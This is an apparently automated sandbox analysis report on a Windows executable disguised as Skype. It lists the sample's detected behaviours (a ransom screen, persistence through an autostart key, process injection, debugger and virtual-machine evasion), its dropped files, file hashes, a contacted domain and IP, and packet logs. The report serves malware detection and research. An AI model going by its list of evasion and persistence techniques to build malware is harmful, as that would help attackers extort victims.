Loading ...

General Information

Analysis ID:29509
Start time:12:43:08
Start date:30/03/2013
Overall analysis duration:0h 3m 24s
Sample file name:skype-3e99fab7f175eb8bf283b1e883c714c9.exe
Cookbook file name:default.jbs
Analysis system description:XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of analysed new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
SCAE enabled:true
SCAE success:true, ratio: 66%
Warnings:
  • Report size getting too big, to mutch NtQueryValueKey calls found.

Signature Overview

Spam, unwanted Advertisements and Ransom Demands:
Shows text to the screen which may be used to demand a ransom in order to use the computerShow sources
Protection of GUI :
Contains functionality to create a new desktopShow sources
Networking:
Contains functionality to download additional files from the internetShow sources
Downloads filesShow sources
Urls found in memory or binary dataShow sources
Downloads files from webservers via HTTPShow sources
Performs DNS lookupsShow sources
Boot Survival:
Creates an autostart registry keyShow sources
Persistence and Installation Behavior:
Drops PE filesShow sources
PE File Obfuscation:
Binary may include packed or crypted dataShow sources
System Summary:
Creates files inside the user directoryShow sources
Creates temporary filesShow sources
Reads ini filesShow sources
Spawns processesShow sources
Writes ini filesShow sources
Contains functionality to call native functionsShow sources
Tries to load missing DLLsShow sources
HIPS / PFW / Operating System Protection Evasion:
Contains functionality to inject threads in other processesShow sources
Maps a DLL or memory area into another processShow sources
Anti Debugging:
Contains functionality to query system informationShow sources
Checks if the current process is beeing debuggedShow sources
Contains functionality for execution timing, often used to detect debuggersShow sources
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Found dropped PE file which has not been started or loadedShow sources
Virtual Machine Detection:
Contains functionality to query system informationShow sources
Queries a list of all running processesShow sources
Contains functionality to detect virtual machines (SLDT)Show sources
Contains long sleeps (>= 3 min)Show sources
Hooking and other Techniques for Stealthness:
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Language and Operating System Detection:
Contains functionality to query the account / user nameShow sources
Contains functionality to query windows versionShow sources

Startup

  • system is xp
  • cleanup

Created / dropped Files

File PathMD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\a-squared.jpg031C6D9139595F16B574A2585F717C5B
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\adaware.jpgFE12E3A73BD00F8384A413828F64606A
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\arcavir.jpg217CA00E327F4AAEBA18D725E4636F45
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\av_noav.jpg7403AC851CC6191367B17E1FEC3F080A
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\avast.jpg19514CF8003609E59992FE8C6916D4FE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\avg.jpgD2DAB503A37DB715554647B026E37E33
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\avira.jpg809E929008E768CE12D5849C7E602870
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bitdefender.jpgCAE71F25BF85F666EF24360FF0E8659B
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\clamwin.jpg698C7D006C34B9510DB84EDFF7ADD448
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\comodo.jpg523597EE3704BBDACE5365A85B080EDC
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\drweb.jpgD3006503E4EE7B07C249DEB413172201
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ewido.jpgC20B9CB778068C7126BACA589EF972A9
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\f-prot.jpg9C7651B2A2CB97C9724E021ACEE7FCE6
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\f-secure.jpgD92A499FD92CEBB848D149EC27CE9B76
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gdata.jpg553F0B849082D8021FD579E14CF3F747
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\header.jpg5F16CE55BD0F946FBF0A3EF0E315A287
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ic_0.jpg13F4D5F474C633CEA9A8940186E78C3C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ic_0_1.png8F76F7E513EE462734E864ABC888D788
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ic_0_2.png8318E369940048BF3D0C3775BFF9EC40
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ic_0_3.png7FDA501ACC6E5DDE8D2C4E932D908816
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ic_0_4.png40DFC0EF3D38E805AFABB36692A8FDDD
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ic_0_5.png45AA3ADA78AC085392744F306D7D371D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ic_1.jpg03AD148FA1ABF9462B32F2FF5DD808EE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ic_5_1.jpgD88DFF4059EAA68DAB6089268AB3EF68
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ikarus.jpgA2AA826C393DB7BBF9E58B5AD2BAC149
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\index.html6731D5DDB39298762F13ECA51BCF6DD1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kaspersky.jpgB6A053C242684D35C7AE3DF01421ECFE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mcafee.jpg6617FB414D24BD1888EA2C49E6F8CC1A
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\me_error.jpg004F6BCD13C93CFE2DFC110BC69115EC
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\me_notice.jpgFCF794D20B8DD4C2AED7BEB02047F5AC
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mse.jpgD7FB2D2F6B002C911094003CD9F62E91
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nod32.jpg066E494FAF31568DBF20C94EFA46DFD1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\norton.jpg7440613560E142635423A8755FEA2CE9
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nosignal.jpgC601B36C026B7D8A4146A845E258F9B9
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\onecare.jpg04F2D07F5440C36184A982D88E279EA4
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\outpost.jpg2EC3273A7FC562B9973D639ADF388FEA
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_Q8.jpg64BD7848F9A0341536AB27723AF18B02
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_dagbladhandel.jpg037C6D1AF62538A54DE2E23C6DA6B8B9
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_esso.jpg846D24E00CBF2C793E28688D6578C96A
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_fnac.jpg902335BCD8771F04007AA639480E6E6A
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_free-record-shop.jpgDE3DE05AF2469F6E17AB1507E248C484
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_kruidvat.jpgC0A7945E0E6B86C751B9FCCF842DC66D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_octa__01.jpg6D843DA411609451907845DFAF431438
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_planet-video.jpgFCAAF210797AE5BE4970A5D617CD2AF5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_pressshop.jpg66E68A9C96CC1B1BFB0558A7E756CD55
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_relay.jpg9DF1F7FB20BC99474B9D615436253560
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_selexion.jpgE7350ADF4C2582ACCE75D790D7A44D0C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_shell_01.jpg98B085B22C0A9DE9FB4689F75F54AC7D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_spar_01.jpg06F7FE590D8D0C7A94B63DF425EAC08D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_texaco.jpgC0D9C6674D573678AD3DB799FC3FB3F4
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\p_total.jpgCB65BE7F980511EAB69AB794AF07A8D9
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\panda.jpg613829B0D4DEDD1E55EDBB5BB15410CB
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sophos.jpg978B7068B7DF4BF9B725DA024D9ECF10
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\style.css82280D54B3FE1A2E4517743D5344016E
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\trendmicro.jpgE99F068D275D9794F79EA148E707BEBC
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vba.jpgDA588B3F18A2C2CCB3BDE63E78E302E4
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vexira.jpgFB610BC37978CCEC3C77E3CEBA3591AF
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\zonealarm.jpgD99CD16A3FC790297676508D046B3377
C:\Documents and Settings\Administrator\Application Data\skype.dat3E99FAB7F175EB8BF283B1E883C714C9
C:\Documents and Settings\Administrator\Application Data\skype.iniDF9694591D7E4938F8E201185B60413B
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\5B7NHQO2\63462[1]A91C59DBD1F14D057F827043BC8C1278
\ROUTER8952A0BE900F2A37CC9502BC155B6708

Contacted Domains

NameIPName ServerActiveRegistrare-Mail
gfosi.net80.72.37.108d.dxmx.com b.dxmx.com e.dxmx.com c.dxmx.com a.dxmx.com truePDR LTD. D/B/A PUBLICDOMAINREGISTRY.COMguy.chisholm@yahoo.com

Contacted IPs

IPCountryPingableOpen Ports
80.72.37.108POLANDtrue80
195.186.1.121SWITZERLANDfalse
195.186.4.121SWITZERLANDfalse

Static File Info

File type:PE32 executable (GUI) Intel 80386, for MS Windows
File name:skype-3e99fab7f175eb8bf283b1e883c714c9.exe
File size:98304
MD5:3e99fab7f175eb8bf283b1e883c714c9
SHA1:c355d00ec348d3a42910ce4dd447b41b76181958
SHA256:4a9328f9755aef14f0f6c0d85dcdd3f010fb2c58e2fd7d3495c7e81fd02572a0
SHA512:1d0680c0f0d5d9ff009aa8228eedf36b477c0a7af8bb4f890b20f254432d46edb191812af082ab3e6602480e2d699833778531cdf1693b029e25810e6e3baada

Static PE Info

General
Entrypoint:0x402e01
Entrypoint Section:.text
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x4B18261D [Thu Dec 3 20:57:01 2009 UTC]
TLS Callbacks:
Resources
NameRVASizeTypeLanguageCountry
RT_ICON0x54d3f20x6500f8data
RT_GROUP_ICON0x54f6900x14MS Windows icon resource - 1 icon
RT_VERSION0x54f6a40x3e0dataRussianRussia
Sections
NameVirtual AddressVirtual SizeRaw SizeEntropy
.text0x10000x3980a0xf0004.97067309698
.rdata0x3b0000xc85c0x30000.0
.data0x480000x504cbc0x20003.68951531059
.rsrc0x54d0000x2a880x30001.14665480338
Version Infos
DescriptionData
LegalCopyrightCopyright .
InternalNameSoft
FileVersion14.0.0.715
CompanyNameSoftware
LegalTrademarksSoft
Comments
ProductName
ProductVersion14.0.0.715
FileDescriptionSoftware
OriginalFilenameSoftware.exe
Translation0x0409 0x04b0
Possible Origin
Language of compilation systemCountry where language is spokenMap
RussianRussia

Network Behavior

TCP Packets
TimestampSource PortDest PortSource IPDest IP
Mar 30, 2013 12:45:32.344860077 CET6040153192.168.0.10195.186.1.121
Mar 30, 2013 12:45:33.343373060 CET6040153192.168.0.10195.186.4.121
Mar 30, 2013 12:45:34.333019972 CET5360401195.186.4.121192.168.0.10
Mar 30, 2013 12:45:34.434057951 CET5360401195.186.1.121192.168.0.10
Mar 30, 2013 12:45:34.482373953 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:34.482415915 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:34.482762098 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:34.509351969 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:34.509416103 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.062237024 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.206619978 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.207092047 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.207112074 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.227907896 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.228705883 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.228722095 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.232108116 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.232891083 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.232924938 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.326292992 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.331640005 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.331651926 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.336519003 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.351562023 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.405520916 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.406052113 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.406074047 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.406904936 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.420597076 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.420836926 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.421345949 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.421395063 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.421747923 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.431209087 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.431221008 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.431996107 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.500309944 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.505547047 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.505558968 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.510863066 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.524666071 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.524674892 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.525486946 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.549489021 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.549725056 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.549989939 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.550008059 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.550898075 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.558027029 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.558727980 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.558758974 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.559307098 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.565576077 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.565946102 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.566911936 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.566930056 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.569746971 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.574939966 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.574954987 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.575658083 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.619829893 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.620549917 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.620564938 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.621200085 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.639465094 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.668884039 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.669277906 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.670609951 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.674181938 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.674211979 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.674257040 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.674681902 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.675179958 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.675925970 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.679500103 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.679531097 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.679999113 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.712486029 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.735224009 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.739358902 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.739808083 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.739847898 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.739865065 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.741535902 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.741570950 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.760883093 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.761701107 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.761759996 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.762353897 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.764723063 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.765088081 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.765662909 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.765674114 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.765688896 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.766226053 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.766472101 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.786163092 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.786175013 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.786895037 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.813549995 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.814059019 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.814081907 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.814927101 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.846503973 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.850408077 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.855798006 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.855817080 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.861104012 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.872262955 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.872276068 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.877595901 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.918711901 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.919387102 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.919401884 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.919708967 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.922699928 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.922976971 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.923333883 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.923374891 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.923599005 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.923878908 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.935956001 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.936165094 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.936532021 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.936634064 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.936657906 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.936966896 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.937364101 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.937460899 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.937546968 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.944416046 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.946793079 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.961937904 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.961946964 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.962667942 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.995109081 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.995805025 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:41.995824099 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:41.999102116 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.089137077 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.092706919 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.093439102 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.093462944 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.094039917 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.096477985 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.096489906 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.096770048 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.097172022 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.097240925 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.097351074 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.097369909 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.097630978 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.097897053 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.098184109 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.102103949 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.102154970 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.118537903 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.118777037 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.118968964 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.119174004 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.119193077 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.119467974 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.119879007 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.119955063 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.235388994 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.236073017 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.236105919 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.236588001 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.264311075 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.266021967 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.271430969 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.271449089 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.272315025 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.272556067 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.272950888 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.276607990 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.276648998 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.276664019 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.277858019 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.277869940 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.278338909 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.278353930 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.281794071 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.281812906 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.284480095 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.290878057 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.290889025 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.291117907 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.291548967 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.291831970 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.291845083 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.292231083 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.329494953 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.355081081 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.355786085 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.355837107 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.356223106 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.440366983 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.442203045 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.443017960 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.443032026 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.443254948 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.446078062 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.446341038 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.446625948 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.446966887 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.447062969 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.447082996 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.447240114 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.447525024 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.447599888 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.447922945 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.447999954 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.448823929 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.448834896 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.451019049 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.461363077 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.466481924 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.466828108 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.467562914 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.467578888 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.467926025 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.602170944 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.747694016 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.748316050 CET103180192.168.0.1080.72.37.108
Mar 30, 2013 12:45:42.748383999 CET80103180.72.37.108192.168.0.10
Mar 30, 2013 12:45:42.923095942 CET103180192.168.0.1080.72.37.108
UDP Packets
TimestampSource PortDest PortSource IPDest IP
Mar 30, 2013 12:45:32.344860077 CET6040153192.168.0.10195.186.1.121
Mar 30, 2013 12:45:33.343373060 CET6040153192.168.0.10195.186.4.121
Mar 30, 2013 12:45:34.333019972 CET5360401195.186.4.121192.168.0.10
Mar 30, 2013 12:45:34.434057951 CET5360401195.186.1.121192.168.0.10
ICMP Packets
